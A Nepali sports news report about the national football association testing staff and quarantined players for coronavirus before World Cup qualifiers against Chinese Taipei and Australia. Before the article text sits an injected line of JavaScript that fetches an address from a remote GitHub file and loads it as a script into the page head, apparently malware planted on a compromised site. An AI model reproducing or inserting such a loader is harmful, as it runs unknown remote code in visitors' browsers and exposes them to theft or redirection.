;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन २६,
काठमाण्डौ । अखिल नेपाल फुटबल संघ (एन्फा)ले कर्मचारी र प्रशिक्षणमा बोलाइएका खेलाडीको आजदेखि कोरोना परीक्षण गर्ने भएको छ । फिफा विश्वकप छनोटका लागि तयारी गर्नु अगाडि एन्फाले कर्मचारी र प्रशिक्षकको कोरोना परीक्षण गर्ने भएको हो ।
आज काठमाण्डौ बाहिरबाट आएर होटलमा क्वरेण्टीनमा बसेका ११ जना खेलाडीको कोरोना परीक्षण हुनेछ । उनीहरुको बिहान १० बजेदेखि पाटन अस्पतालमा कोरोना परीक्षण हुने भएको हो । भदौ १ गतेबाट प्रशिक्षण सुरु हुनेछ । काठमाण्डौ उपत्यका बाहिरबाट आएका ११ खेलाडी होटलमा बसेका छन्, भने २२ जना खेलाडी घरमा नै होम क्वरेण्टीनमा छन् ।
विश्वकप छनोट अन्तर्गत नेपालले ३ वटा खेल घरेलु मैदानमा खेल्ने योजना छ । नेपालले आउँदो असोज २२ गते चाइनिज ताइपेईसँग खेल्दैछ । त्यसको ५ दिनपछि अर्थात् असोज २७ गते अष्ट्रेलियासँग खेल्ने तालिका छ ।file Photo
फेसबुक प्रतिक्रियाहरु